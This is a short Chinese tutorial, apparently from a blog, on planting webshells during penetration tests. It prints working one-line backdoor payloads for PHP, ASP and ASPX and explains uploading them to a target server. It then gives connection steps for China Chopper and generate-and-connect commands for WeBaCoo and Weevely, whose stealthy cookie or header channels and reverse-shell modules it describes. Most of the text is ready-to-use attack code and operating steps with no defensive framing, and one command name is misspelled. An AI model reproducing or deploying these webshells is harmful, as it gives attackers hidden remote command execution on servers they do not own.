kali渗透测试-WebShell(中国菜刀、WeBaCoo、Weevely)

本质 : 上传一句话木马

 echo shell_exec($_GET[‘cmd‘]);?>

windows平台

中国菜刀

支持asp、php、asp.net和jsp等
可能被IDS、AV、WAF、扫描器软件发现查杀

使用方法:
  1. 往目标web服务器上传相应的一句话木马

asp一句话木马:

<%execute(request("pass"))%>

php一句话木马:

 @eval($_POST[pass]);?>

aspx一句话木马:

<%@ Page Language="Jscript"%>

<%eval(Request.Item["pass"])%>
  1. 打开中国菜刀,输入网址和密码(一句话木马中的参数) 连接服务端
    kali渗透测试-WebShell(中国菜刀、WeBaCoo、Weevely)_第1张图片

Linux平台

获取的是类终端的shell
通信内容base64编码后通过cookie头传输,隐蔽性较强
缺点是不能指定密码

cookie中的参数
  • cm: base64编码的命令

  • cn: 服务器用于返回数据的cookie头的名

  • cp: 返回信息定界符

使用方法

1、生成服务器端

wenacoo -g -o a.php

2、上传后用客户端进行连接

webacoo -t -u http://1.1.1.1/a.php

Weevely(只支持PHP)

  • 用http头进行指令传输
  • 隐蔽的类终端PHP Webshell
  • 有30多个管理模块

    • 执行系统命令、浏览文件系统

    • 检查服务器常见配置错误

    • 创建正向、反向TCP Shell连接

    • 通过目标计算机代理HTTP流量

    • 从目标计算机运行端口扫描,渗透内网

  • 支持连接密码

使用方法

1、生成服务端

weevely generate <password> b.php

生成的文件在 /usr/share/weevely/ 目录下

2、 连接客户端

weevely <URL> <password>

3、 输入help查看模块
kali渗透测试-WebShell(中国菜刀、WeBaCoo、Weevely)_第2张图片

你可能感兴趣的:(笔记)